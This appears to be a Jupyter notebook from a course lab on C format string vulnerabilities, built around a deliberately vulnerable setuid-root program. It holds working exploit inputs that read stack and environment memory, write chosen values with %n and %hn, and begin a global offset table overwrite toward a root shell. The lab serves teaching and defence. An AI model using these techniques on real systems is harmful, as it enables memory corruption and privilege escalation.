# Format Strings
http://www.cplusplus.com/reference/cstdio/printf/?kw=printf

- `printf()` in C/C++ can be used to print fixed strings, variables in many different formats
- hello.c program uses `printf()` incorrectly!
- "Hello World\n" string technically is the format string (devoid of special escape sequences called format parameters)
- format parameters begins with a `%` sign; for each format parameter (%) function expects arguments
- format specifier follows this prototype:
`%[flags][width][.precision][length]specifier`

- following parameter requires values as arguments

| Parameter | Output Type |
| --- | --- |
| %d | Decimal |
| %u | Unsigned decimal |
| %x | Hexadecimal |

- the following parameters expect pointers as arguments

| Parameter | Output Type |
| --- | --- |
| %s | String |
| %n | Number of bytes written so far |
| %p | Memory address |

In [1]:
# copy hello.c from booksrc folder
! cp booksrc/hello.c .
! ls -al hello.c

-rw-r--r-- 1 kali kali 78 Aug 22 22:01 hello.c


In [2]:
! cat hello.c

#include <stdio.h>

int main() {
    printf("Hello World!\n");
    return 0;
}

## Use compile.sh script to compile c programs
- disables all compiler and system level bufferoverflow protections

In [3]:
# compile and run hello.c
! cp booksrc/compile.sh .
! chmod u+x compile.sh
! ./compile.sh hello.c hello.exe

In [4]:
! ./hello.exe

Hello World!


## Format Parameters Examples
- copy fmt_strings.c from booksrc; examine, compile and run it

In [5]:
! cp ./booksrc/fmt_strings.c .

In [6]:
! cat fmt_strings.c

// fmt_strings.c

#include <stdio.h>
#include <string.h>

int main() {
   char string[10];
   int A = -73;
   unsigned int B = 31337;

   strcpy(string, "sample");

   // Example of printing with different format string
   printf("[A] Dec: %d, Hex: %x, Unsigned: %u\n", A, A, A);
   printf("[B] Dec: %d, Hex: %x, Unsigned: %u\n", B, B, B);
   printf("[field width on B] 3: '%3u', 10: '%10u', '%08u'\n", B, B, B);
   printf("[string] %s  Address %p\n", string, string);

   // Example of unary address operator (dereferencing) and a %x format string
   printf("variable A is at address: %p\n", &A);
}

In [7]:
! ./compile.sh fmt_strings.c fmt_strings.exe

In [8]:
# note high value for A: -ve value is stored in two's complement
! ./fmt_strings.exe

[A] Dec: -73, Hex: ffffffb7, Unsigned: 4294967223
[B] Dec: 31337, Hex: 7a69, Unsigned: 31337
[field width on B] 3: '31337', 10: '     31337', '00031337'
[string] sample  Address 0xffffc382
variable A is at address: 0xffffc37c


## Format Parameter %n Example
- %n - uncommon, but let's understand how it works
- %n - writes the number of bytes written so far to the corresponding variable's address

In [9]:
! cp booksrc/fmt_uncommon.c .

In [452]:
cat fmt_uncommon.c

#include <stdio.h>
#include <stdlib.h>

int main() {
   int A = 5, B = 7, count_one, count_two;

   // Example of a %n format string
   printf("The number of bytes written up to this point X%n is being stored in count_one, and the number of bytes up to here X%n is being stored in count_two.\n", &count_one, &count_two);

   printf("count_one: %d\n", count_one);
   printf("count_two: %d\n", count_two);

   // Stack Example
   printf("A is %d and is at %08x.  B is %x.\n", A, &A, B);

   exit(0);
}	


In [11]:
! ./compile.sh fmt_uncommon.c fmt_uncommon.exe

In [12]:
! ./fmt_uncommon.exe

The number of bytes written up to this point X is being stored in count_one, and the number of bytes up to here X is being stored in count_two.
count_one: 46
count_two: 113
A is 5 and is at ffffc378.  B is 7.


### structure of stack when printf( ) is called in fmt_uncommon.c
- look at the last printf()

### printf("A is %d and is at %08x.  B is %x.\n", A, &A, B);

- hint, parameters are pushed on reverse order


|Top of the stack|
| :----: |
| Address of format string (first argument)|
| Value of A|
| Address of A|
| Value of B|
| ... |
| Bottom of the Stack|

### what if fewer arguments are passed to printf()?
- printf("A is %d and is at %08x. B is %x.\n", A, &A);

In [13]:
# remove , B from fmt_uncommon.c program
! sed -e 's/, B)/)/' fmt_uncommon.c > fmt_uncommon2.c

In [14]:
# see the difference between the original and the new file
! diff fmt_uncommon.c fmt_uncommon2.c

14c14
<    printf("A is %d and is at %08x.  B is %x.\n", A, &A, B);
---
>    printf("A is %d and is at %08x.  B is %x.\n", A, &A);


In [15]:
# let's compile the new file
! ./compile.sh fmt_uncommon2.c fmt_uncommon2.exe

In [16]:
# execute the program
! ./fmt_uncommon2.exe

The number of bytes written up to this point X is being stored in count_one, and the number of bytes up to here X is being stored in count_two.
count_one: 46
count_two: 113
A is 5 and is at ffffc378.  B is 8049189.


#### what happened to the value of B?
- since there's no corresponding argument for third %x, it pulled some value stored in the location where the third argument was supposted to be pushed
- this is the value found found below the stack frame for the printf function
- program read data from memory that it's not supposed to

## The Format String Vulnerability
- if string is printed directly `printf(string)` instead of `printf("%s", string)`
- compile and run fmt_vuln.c from booksrc folder

```bash
$ ./compile.sh fmt_vuln.c fmt_vuln.exe
$ sudo chown root:root ./fmt_vuln.exe
$ sudo chmod u+s ./fmt_vuln.exe
$ ./fmt_vuln.exe testing
$ ./fmt_vuln.exe testing%x
$ ./fmt_vuln.exe $(perl -e 'print "%08x."x40')
```

- print four repeating bytes in reverse order (little-endian architecture)
- $ printf "\x25\x30\x38\x78\x2e\n"
    - these are the arguments for format string stored in higher memory addresses

In [1]:
! cp ./booksrc/fmt_vuln.c .
! cat fmt_vuln.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
   char text[1024];
   static int test_val = -72;

   if(argc < 2) {
      printf("Usage: %s <text to print>\n", argv[0]);
      exit(0);
   }
   strcpy(text, argv[1]);

   printf("The right way to print user-controlled input:\n");
   printf("%s", text);

   printf("\nThe wrong way to print user-controlled input:\n");
   printf(text);

   printf("\n");

   // Debug output
   printf("[*] test_val @ 0x%08x = %d 0x%08x\n", &test_val, test_val, test_val);
   printf("[*] text is @ %p\n", &text);
   exit(0);
}


In [2]:
! echo kali | sudo -S ./compile.sh fmt_vuln.c fmt_vuln.exe

[sudo] password for kali: 

In [3]:
# user is password for sudo user
! echo kali | sudo -S chown root:root ./fmt_vuln.exe

[sudo] password for kali: 

In [4]:
# check ownership of the fmt_vuln.exe
! ls -al fmt_vuln.exe

-rwxr-xr-x 1 root root 17932 Aug 23 18:43 fmt_vuln.exe


In [5]:
! echo kali | sudo -S chmod u+s ./fmt_vuln.exe

[sudo] password for kali: 

In [6]:
! ls -al fmt_vuln.exe

-rwsr-xr-x 1 root root 17932 Aug 23 18:43 fmt_vuln.exe


In [7]:
# run fmt_vuln.exe
! ./fmt_vuln.exe

Usage: ./fmt_vuln.exe <text to print>


In [8]:
! ./fmt_vuln.exe testing

The right way to print user-controlled input:
testing
The wrong way to print user-controlled input:
testing
[*] test_val @ 0x0804c02c = -72 0xffffffb8
[*] text is @ 0xffffbf90


In [9]:
# what if you provide %s as value
! ./fmt_vuln.exe testing%s
# notice testing repeats twice!

The right way to print user-controlled input:
testing%s
The wrong way to print user-controlled input:
testingtesting%s
[*] test_val @ 0x0804c02c = -72 0xffffffb8
[*] text is @ 0xffffbf90


In [10]:
# what if you provide %x as part of value
! ./fmt_vuln.exe testing%x

The right way to print user-controlled input:
testing%x
The wrong way to print user-controlled input:
testingffffbf90
[*] test_val @ 0x0804c02c = -72 0xffffffb8
[*] text is @ 0xffffbf90


In [11]:
# process can be used repeatedly to examine stack memory
# just provide a lot of format parameter as string and see what's on stack
! ./fmt_vuln.exe $(python -c 'print("data" + "%08x."*40, end="")')
# Note: as more data is passed to the program, text address shifts

The right way to print user-controlled input:
data%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.
The wrong way to print user-controlled input:
dataffffbec0.00000000.080491bc.61746164.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.
[*] test_val @ 0x0804c02c = -72 0xffffffb8
[*] text is @ 0xffffbec0


In [12]:
# process can be used repeatedly to examine stack memory
# just provide a lot of format parameter as string and see what's on stack
! ./fmt_vuln.exe $(perl -e 'print "%08x."x40')

The right way to print user-controlled input:
%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.
The wrong way to print user-controlled input:
ffffbed0.00000000.080491bc.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.
[*] test_val @ 0x0804c02c = -72 0xffffffb8
[*] text is @ 0xffffbed0


In [13]:
# bunch of 2e78383025 are repeated
# each four bytes values are reversed due to little-endian architecture
! perl -e 'print "\x25\x30\x38\x78\x2e"'

%08x.

In [14]:
# bunch of 2e78383025 are repeated, wonder what they are...
# each four bytes values are reversed due to little-endian architecture
! python -c 'print("\x25\x30\x38\x78\x2e", end="")'

%08x.

In [15]:
# try to print the same results in string
! ./fmt_vuln.exe $(perl -e 'print "%s."x40')

The right way to print user-controlled input:
%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.
The wrong way to print user-controlled input:


In [16]:
# try to print the same results in string
! ./fmt_vuln.exe $(python -c 'print("%s."*40, end="")')
# you'll get Segmentation fault on the terminal

The right way to print user-controlled input:
%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.%s.
The wrong way to print user-controlled input:


## Reading from Arbitrary Memory Addresses
- `%s` format parameter can be used to read from arbitrary memory addresses
- part of the original format string can be used to supply an address to the %s format parameter
- if a valid memory address is used, this process could be used to read a string found at that memory address
- we'll use booksrc/getenvaddr.c to get some env variable address
- use the path address to provide the value for %s

```bash
$ ./fmt_vuln.exe $(print "\x address in reverse bytes")%08x-%08x-%08x-%s
```

In [17]:
# provide a bunch of %08x as a part of string to see where the first string repeats
! ./fmt_vuln.exe AAAA-%08x-%08x-%08x-%08x-%08x
# notice that fourth parameter is repeating from begnning of the format string 
# AAAA to gets its data

The right way to print user-controlled input:
AAAA-%08x-%08x-%08x-%08x-%08x
The wrong way to print user-controlled input:
AAAA-ffffbf70-00000000-080491bc-41414141-3830252d
[*] test_val @ 0x0804c02c = -72 0xffffffb8
[*] text is @ 0xffffbf70


In [18]:
# try printing the AAAA as %s
! ./fmt_vuln.exe AAAA%08x-%08x-%08x-%s
# why do we get segfault?
# it's attempting to print string at the address AAAA; recall %s needs address of c-string

The right way to print user-controlled input:
AAAA%08x-%08x-%08x-%s
The wrong way to print user-controlled input:


In [19]:
# how about we provide some valid memory address instead of AAAA
! env | grep $PATH

PATH=/home/kali/miniconda3/bin:/home/kali/miniconda3/condabin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games


In [20]:
# compile and run getevnaddr.c to find the memory address of env variables respective to programs
! cp ./booksrc/getenvaddr.c .

In [21]:
! cat getenvaddr.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
	char *ptr;

	if(argc < 3) {
		printf("Usage: %s <environment variable> <target program name>\n", argv[0]);
		exit(0);
	}
	ptr = getenv(argv[1]); /* get env var location */
	int diff = (strlen(argv[0]) - strlen(argv[2]))*2;
	ptr += diff; /* adjust for program name */
	printf("%s will be at %p\n", argv[1], ptr);
}


In [22]:
! ./compile.sh getenvaddr.c getenvaddr

In [23]:
! ./getenvaddr PATH ./fmt_vuln.exe

PATH will be at 0xffffdd0f


In [24]:
# lets try to read the value of PATH using fmt_vuln.exe
! ./fmt_vuln.exe $(printf "\x0f\xdd\xff\xff")%08x-%08x-%08x-%s

The right way to print user-controlled input:
���%08x-%08x-%08x-%s
The wrong way to print user-controlled input:
���ffffbf80-00000000-080491bc-H=/home/kali/miniconda3/bin:/home/kali/miniconda3/condabin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
[*] test_val @ 0x0804c02c = -72 0xffffffb8
[*] text is @ 0xffffbf80


### Notice if part of variable name PATH= is missing from the value /home/user/...
- we can stubtract (# of missing characters) from the least siginificant byte by reducing the PATH address by 5 bytes

In [25]:
! printf "%x" $((0x0f-3))

c

In [26]:
! ./fmt_vuln.exe $(printf "\x0c\xdd\xff\xff")%08x-%08x-%08x-%s
# now we see our complete path

The right way to print user-controlled input:
���%08x-%08x-%08x-%s
The wrong way to print user-controlled input:
���ffffbf80-00000000-080491bc-PATH=/home/kali/miniconda3/bin:/home/kali/miniconda3/condabin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
[*] test_val @ 0x0804c02c = -72 0xffffffb8
[*] text is @ 0xffffbf80


## Writing to Arbitrary Memory Addresses
- %s - used to read an arbitrary memory address
- `%n` format parameter can be used to write to arbitrary memory address
- `test_val` variable has been printing its address and value in the debug statement
```bash
$ fmt_vuln.exe $(printf "\x reverse address of test_val")-%08x-%08x-%08x-%n
```
- the resulting value in the test variable depends on the number of bytes written before the `%n`
- this can be controlled to a a greater degree by manipulating the field width option
```bash
$ fmt_vuln.exe $(printf "\x reverse address of test_val")-%x-%x-%x-%n
$ fmt_vuln.exe $(printf "\x reverse address of test_val")-%x-%x-%100x-%n
$ fmt_vuln.exe $(printf "\x reverse address of test_val")-%x-%x-%400x-%n
```

In [27]:
# let's note the address of testing
! ./fmt_vuln.exe testing

The right way to print user-controlled input:
testing
The wrong way to print user-controlled input:
testing
[*] test_val @ 0x0804c02c = -72 0xffffffb8
[*] text is @ 0xffffbf90


In [28]:
# use the address of test_val to write to 
! ./fmt_vuln.exe $(printf "\x2c\xc0\x04\x08")-%08x-%08x-%08x-%n
# Notice the test_val which is the total bytes written thus far by printf()

The right way to print user-controlled input:
,�-%08x-%08x-%08x-%n
The wrong way to print user-controlled input:
,�-ffffbf80-00000000-080491bc-
[*] test_val @ 0x0804c02c = 32 0x00000020
[*] text is @ 0xffffbf80


In [29]:
# value can be controlled by manipulating the field width
! ./fmt_vuln.exe $(printf "\x2c\xc0\x04\x08")-%x-%x-%x-%n

The right way to print user-controlled input:
,�-%x-%x-%x-%n
The wrong way to print user-controlled input:
,�-ffffbf80-0-80491bc-
[*] test_val @ 0x0804c02c = 24 0x00000018
[*] text is @ 0xffffbf80


In [30]:
# value can be controlled by manipulating the field width
! ./fmt_vuln.exe $(printf "\x2c\xc0\x04\x08")-%x-%x-%100x-%n

The right way to print user-controlled input:
,�-%x-%x-%100x-%n
The wrong way to print user-controlled input:
,�-ffffbf80-0-                                                                                             80491bc-
[*] test_val @ 0x0804c02c = 117 0x00000075
[*] text is @ 0xffffbf80


In [31]:
# value can be controlled by manipulating the field width
! ./fmt_vuln.exe $(printf "\x2c\xc0\x04\x08")-%x-%x-%200x-%n

The right way to print user-controlled input:
,�-%x-%x-%200x-%n
The wrong way to print user-controlled input:
,�-ffffbf80-0-                                                                                                                                                                                                 80491bc-
[*] test_val @ 0x0804c02c = 217 0x000000d9
[*] text is @ 0xffffbf80


## Writing User-Controlled Values (0xaddress)
- the above trick (manipulating width) works for small numbers but won't work for large ones like memory addresses
- let's write 0xDDCCBBAA to variable test_val
- 0xAA goes to least significant byte, 0xBB to next byte and so on and 0xDD goes to the most significant byte
- $ 0xAA -> 4^{th} byte$
- $ 0xBB -> 3^{rd} byte$
- $ 0xCC -> 2^{nd} byte$
- $ 0xDD -> 1^{st} byte$


In [32]:
# findout the width value to print 0xaa in the right location
# 8 is used to standarize the output
! ./fmt_vuln.exe $(printf "\x2c\xc0\x04\x08")-%x-%x-%8x-%n

The right way to print user-controlled input:
,�-%x-%x-%8x-%n
The wrong way to print user-controlled input:
,�-ffffbf80-0- 80491bc-
[*] test_val @ 0x0804c02c = 25 0x00000019
[*] text is @ 0xffffbf80


In [33]:
# 0xaa is final value - 25 is what 8 width provides
! printf "%d" $(( 0xaa - 25 + 8))

153

In [34]:
# replace width 8 with the resulting value
! ./fmt_vuln.exe $(printf "\x2c\xc0\x04\x08")-%x-%x-%153x-%n
# text_val = 0x000000aa
# we've aa least significant byte in right the place

The right way to print user-controlled input:
,�-%x-%x-%153x-%n
The wrong way to print user-controlled input:
,�-ffffbf80-0-                                                                                                                                                  80491bc-
[*] test_val @ 0x0804c02c = 170 0x000000aa
[*] text is @ 0xffffbf80


In [35]:
# next write 0xbb, 0xcc, and 0xdd
# need 3 more %x%n format to write to each byte of addresses
# since %x needs some 4 bytes to write, we can provide anything such as JUNK
! ./fmt_vuln.exe $(printf "\x2c\xc0\x04\x08JUNK\x2d\xc0\x04\x08JUNK\x2e\xc0\x04\x08JUNK\x2f\xc0\x04\x08")-%x-%x-%8x%n

The right way to print user-controlled input:
,�JUNK-�JUNK.�JUNK/�-%x-%x-%8x%n
The wrong way to print user-controlled input:
,�JUNK-�JUNK.�JUNK/�-ffffbf70-0- 80491bc
[*] test_val @ 0x0804c02c = 48 0x00000030
[*] text is @ 0xffffbf70


In [36]:
# what is the width so the final value is 0xaa
! echo $(( 0xaa-48+8 ))

130


In [37]:
# replace width 8 width with the result to write 0xaa
! ./fmt_vuln.exe $(printf "\x2c\xc0\x04\x08JUNK\x2d\xc0\x04\x08JUNK\x2e\xc0\x04\x08JUNK\x2f\xc0\x04\x08")-%x-%x-%130x%n

The right way to print user-controlled input:
,�JUNK-�JUNK.�JUNK/�-%x-%x-%130x%n
The wrong way to print user-controlled input:
,�JUNK-�JUNK.�JUNK/�-ffffbf70-0-                                                                                                                           80491bc
[*] test_val @ 0x0804c02c = 170 0x000000aa
[*] text is @ 0xffffbf70


In [38]:
# next need to write 0xbb in 2nd byte
! printf "%d" $(( 0xbb - 0xaa ))

17

In [39]:
# now write 0xbb in correct address
# add %17x%n or -%16x%n
! ./fmt_vuln.exe $(printf "\x2c\xc0\x04\x08JUNK\x2d\xc0\x04\x08JUNK\x2e\xc0\x04\x08JUNK\x2f\xc0\x04\x08")-%x-%x-%130x%n-%16x%n

The right way to print user-controlled input:
,�JUNK-�JUNK.�JUNK/�-%x-%x-%130x%n-%16x%n
The wrong way to print user-controlled input:
,�JUNK-�JUNK.�JUNK/�-ffffbf60-0-                                                                                                                           80491bc-        4b4e554a
[*] test_val @ 0x0804c02c = 48042 0x0000bbaa
[*] text is @ 0xffffbf60


In [40]:
! printf "%d" $(( 0xcc - 0xbb ))

17

In [41]:
# now write 0xcc in correct address
# add %17x%n or -16x
! ./fmt_vuln.exe $(printf "\x2c\xc0\x04\x08JUNK\x2d\xc0\x04\x08JUNK\x2e\xc0\x04\x08JUNK\x2f\xc0\x04\x08")-%x-%x-%130x%n-%16x%n-%16x%n

The right way to print user-controlled input:
,�JUNK-�JUNK.�JUNK/�-%x-%x-%130x%n-%16x%n-%16x%n
The wrong way to print user-controlled input:
,�JUNK-�JUNK.�JUNK/�-ffffbf60-0-                                                                                                                           80491bc-        4b4e554a-        4b4e554a
[*] test_val @ 0x0804c02c = 13417386 0x00ccbbaa
[*] text is @ 0xffffbf60


In [42]:
# finally write 0xdd
! echo $(( 0xdd - 0xcc ))

17


In [43]:
# now write 0xdd in correct address
# add %17x%n or -%16x%n
! ./fmt_vuln.exe $(printf "\x2c\xc0\x04\x08AAAA\x2d\xc0\x04\x08AAAA\x2e\xc0\x04\x08BBBB\x2f\xc0\x04\x08")-%x-%x-%130x%n-%16x%n-%16x%n-%16x%n
# note JUNK can be anything

The right way to print user-controlled input:
,�AAAA-�AAAA.�BBBB/�-%x-%x-%130x%n-%16x%n-%16x%n-%16x%n
The wrong way to print user-controlled input:
,�AAAA-�AAAA.�BBBB/�-ffffbf50-0-                                                                                                                           80491bc-        41414141-        41414141-        42424242
[*] test_val @ 0x0804c02c = -573785174 0xddccbbaa
[*] text is @ 0xffffbf50


## Direct Parameter Access
- simplified way to exploit format string vulnerability
- allows parameters to be accessed directly by using argument order # (starting from 1) and the the dollar sign qualifier
    - e.g., `%1$d` would access the $1^{st}$ parameter and display it as a decimal number
    - `%2$x` would access the $2^{nd}$ parameter and display it as as a hexadecimal number
- instead of sequentially accessing the first three parameters and using 4 bytes spacers of JUNK to increment the byte output count, we can use direct parameter access
- let's write a more realistic-looking address of **0xbffffd72** into the variable test_val in fmt_vuln program
- see look into how direct parameter access works using example provided in demo-programs

In [44]:
! cp ./demo-programs/fmtstr_directpara.c .

In [45]:
! cat fmtstr_directpara.c

#include <stdio.h>

int main() {
    printf("7th: %7$d, 4th: %4$05d\n", 10, 20, 30, 40, 50, 60, 70, 80);
    return 0;
}


In [46]:
! ./compile.sh fmtstr_directpara.c directpara.exe

In [47]:
! ./directpara.exe

7th: 70, 4th: 00040


In [48]:
# without direct access
! ./fmt_vuln.exe AAAA%x%x%x%x
# 4th paramete is where AAAA repeats; not sure try one at a time by adding %x

The right way to print user-controlled input:
AAAA%x%x%x%x
The wrong way to print user-controlled input:
AAAAffffbf80080491bc41414141
[*] test_val @ 0x0804c02c = -72 0xffffffb8
[*] text is @ 0xffffbf80


In [49]:
# access the fourth argument (from beginning of the format string printf(...))
# $ sign is special character for bash so must be escaped
! ./fmt_vuln.exe AAAA%4\$x
# can try 1 at a time from 1...n until you see AAAA printed in hex

The right way to print user-controlled input:
AAAA%4$x
The wrong way to print user-controlled input:
AAAA41414141
[*] test_val @ 0x0804c02c = -72 0xffffffb8
[*] text is @ 0xffffbf90


In [50]:
# use the same technique to write to the 4th argument as address
! ./fmt_vuln.exe $(printf "AAAA")%4\$n
# get seg fault - because AAAA is not a valid address

The right way to print user-controlled input:
AAAA%4$n
The wrong way to print user-controlled input:


In [51]:
# don't get segfault if AAAA was a valid memory address
# let's write to test_val's adddress
! ./fmt_vuln.exe $(printf "\x2c\xc0\x04\x08")%4\$n

The right way to print user-controlled input:
,�%4$n
The wrong way to print user-controlled input:
,�
[*] test_val @ 0x0804c02c = 4 0x00000004
[*] text is @ 0xffffbf90


In [52]:
# no need of JUNK just use direct parameter access to write the rest
! ./fmt_vuln.exe $(printf "\x2c\xc0\x04\x08\x2d\xc0\x04\x08\x2e\xc0\x04\x08\x2f\xc0\x04\x08")%4\$n

The right way to print user-controlled input:
,�-�.�/�%4$n
The wrong way to print user-controlled input:
,�-�.�/�
[*] test_val @ 0x0804c02c = 16 0x00000010
[*] text is @ 0xffffbf80


In [53]:
# let's do some math to get 0x72
! printf "%d" $((0x72-16))

98

In [54]:
# use the result as width to get 0x72 as least significant value fof our controlled address: 0xbffffd72
! ./fmt_vuln.exe $(printf "\x2c\xc0\x04\x08\x2d\xc0\x04\x08\x2e\xc0\x04\x08\x2f\xc0\x04\x08")%98x%4\$n

The right way to print user-controlled input:
,�-�.�/�%98x%4$n
The wrong way to print user-controlled input:
,�-�.�/�                                                                                          ffffbf80
[*] test_val @ 0x0804c02c = 114 0x00000072
[*] text is @ 0xffffbf80


In [55]:
# do some math to print 0xfd of our controlled address: 0xbffffd72
! printf "%d" $((0xfd-0x72))

139

In [56]:
# use 139 as width to get 0xfd as next value
! ./fmt_vuln.exe $(printf "\x2c\xc0\x04\x08\x2d\xc0\x04\x08\x2e\xc0\x04\x08\x2f\xc0\x04\x08")%98x%4\$n%139x%5\$n

The right way to print user-controlled input:
,�-�.�/�%98x%4$n%139x%5$n
The wrong way to print user-controlled input:
,�-�.�/�                                                                                          ffffbf70                                                                                                                                          0
[*] test_val @ 0x0804c02c = 64882 0x0000fd72
[*] text is @ 0xffffbf70


In [57]:
# do some math to print 0xff of our controlled address: 0xbffffd72
! echo $((0xff-0xfd))

2


In [58]:
# width of 2 doesn't work; shorter than (4 bytes) memory address!
# add 1 in the front to make 0xff a bigger number
! echo $((0x1ff-0xfd))

258


In [59]:
# use 2 as width to get 0xff as next value
! ./fmt_vuln.exe $(printf "\x2c\xc0\x04\x08\x2d\xc0\x04\x08\x2e\xc0\x04\x08\x2f\xa0\x04\x08")%98x%4\$n%139x%5\$n%258x%6\$n

The right way to print user-controlled input:
,�-�.�/�%98x%4$n%139x%5$n%258x%6$n
The wrong way to print user-controlled input:
,�-�.�/�                                                                                          ffffbf70                                                                                                                                          0                                                                                                                                                                                                                                                           80491bc
[*] test_val @ 0x0804c02c = 33553778 0x01fffd72
[*] text is @ 0xffffbf70


In [60]:
# do some math to print 0xbf of our controlled address: 0xbffffd72
! echo $((0xbf-0xff))

-64


In [61]:
# negative width will not work!, make 0xbf larger by prepending 1
! echo $((0x1bf-0xff))

192


In [62]:
# use 2 as width to get 0xff as next value
! ./fmt_vuln.exe $(printf "\x2c\xc0\x04\x08\x2d\xc0\x04\x08\x2e\xc0\x04\x08\x2f\xc0\x04\x08")%98x%4\$n%139x%5\$n%258x%6\$n%192x%7\$n

The right way to print user-controlled input:
,�-�.�/�%98x%4$n%139x%5$n%258x%6$n%192x%7$n
The wrong way to print user-controlled input:
,�-�.�/�                                                                                          ffffbf60                                                                                                                                          0                                                                                                                                                                                                                                                           80491bc                                                                                                                                                                                         804c02c
[*] test_val @ 0x0804c02c = -1073742478 0xbffffd72
[*] text is @ 0xffffbf60


## Using Short (2 bytes) Writes
- a `short` is typically a two-byte word using `h`
- helps write an entire four-byte value with just two `%hn` parameters, instead of 4!
- let's overwrite test_val variable with the address `0xbffffd72`

In [63]:
# update least significant byte
! ./fmt_vuln.exe $(printf "\x2c\xc0\x04\x08")%x%x%x%n

The right way to print user-controlled input:
,�%x%x%x%n
The wrong way to print user-controlled input:
,�ffffbf80080491bc
[*] test_val @ 0x0804c02c = 20 0x00000014
[*] text is @ 0xffffbf80


In [64]:
# notice the test_val in hex: updates on both ends of the 4 bytes
! ./fmt_vuln.exe $(perl -e 'print "\x2c\xc0\x04\x08"')%x%x%x%hn

The right way to print user-controlled input:
,�%x%x%x%hn
The wrong way to print user-controlled input:
,�ffffbf80080491bc
[*] test_val @ 0x0804c02c = -65516 0xffff0014
[*] text is @ 0xffffbf80


In [65]:
# short write can be used with direct parameter access
# update two least significnat bytes
! ./fmt_vuln.exe $(printf "\x2e\xc0\x04\x08")%4\$hn

The right way to print user-controlled input:
.�%4$hn
The wrong way to print user-controlled input:
.�
[*] test_val @ 0x0804c02c = 327608 0x0004ffb8
[*] text is @ 0xffffbf90


In [66]:
# lets write 0xbffffd72 to test_val
# 0xfd72 is written in first two (lower) bytes
# Since 8 bytes of memory addresses will be written, subtract it from actual
#  ./fmt_vuln.exe $(printf "\x2c\xc0\x04\x08\x2e\xc0\x04\x08")%[w]x%4\$hn%[w]x%5\%hn
! echo $((0xfd72-8))

64874


In [309]:
! ./fmt_vuln.exe $(printf "\x2c\xc0\x04\x08\x2e\xc0\x04\x08")%64874x%4\$hn

The right way to print user-controlled input:
,�.�%64874x%4$hn
The wrong way to print user-controlled input:
,�.�                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                               

In [310]:
# 0xbfff is written in last two (higher bytes)
! echo $((0xbfff-0xfd72))

-15731


In [312]:
# smaller than previous width so, prepend 1
! echo $((0x1bfff-0xfd72))

49805


In [67]:
# finally write 0xbffffd72 to test_val using 4th and 5th parameters
! ./fmt_vuln.exe $(printf "\x2c\xc0\x04\x08\x2e\xc0\x04\x08")%64874x%4\$hn%49805x%5\$hn

The right way to print user-controlled input:
,�.�%64874x%4$hn%49805x%5$hn
The wrong way to print user-controlled input:
,�.�                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                   

## Control the execution flow of the program
- overwrite the return address in the most recent stack frame
- stack-based overflow only allows overflowing return address
- format string vulnerability provides the ability to overwrite any memory address!!

### Detours with .dtors
#### .dtors and .ctors are called something different in modern gcc and not sure, what they are!
#### !!!ignoring!!!
- in GNU C compiled programs, special table sections called .dtors and .ctors are created
- .dtors are made for destructors
- .ctors are made for constructors
- a function can be declared as a destructor function by defining the destructor attribute
- see dtors_sample.c

## Overwriting the Global Offset Table
- PLT (procedure linkage table) is used to store shared library
- consists of many jump instructions each one corresponding to the address of a function
- each time a shared function needs to be called, control will pass through the PLT
- objdump program can be used to see .plt section
- exit() is called at the end of the program
- if exit() function can be manipulated to direct the execution flow into shellcode, a root shell will be spawned
- most of the functions are not jumping to addresses but to pointers to addresses
    - e.g., exit() function's address is stored at `0x0804a018`
- these addresses exist in another section, called the global offset table (GOT) which is writable

In [68]:
! objdump -d -j .plt ./fmt_vuln.exe


./fmt_vuln.exe:     file format elf32-i386


Disassembly of section .plt:

08049020 <.plt>:
 8049020:	ff 35 04 c0 04 08    	pushl  0x804c004
 8049026:	ff 25 08 c0 04 08    	jmp    *0x804c008
 804902c:	00 00                	add    %al,(%eax)
	...

08049030 <printf@plt>:
 8049030:	ff 25 0c c0 04 08    	jmp    *0x804c00c
 8049036:	68 00 00 00 00       	push   $0x0
 804903b:	e9 e0 ff ff ff       	jmp    8049020 <.plt>

08049040 <strcpy@plt>:
 8049040:	ff 25 10 c0 04 08    	jmp    *0x804c010
 8049046:	68 08 00 00 00       	push   $0x8
 804904b:	e9 d0 ff ff ff       	jmp    8049020 <.plt>

08049050 <puts@plt>:
 8049050:	ff 25 14 c0 04 08    	jmp    *0x804c014
 8049056:	68 10 00 00 00       	push   $0x10
 804905b:	e9 c0 ff ff ff       	jmp    8049020 <.plt>

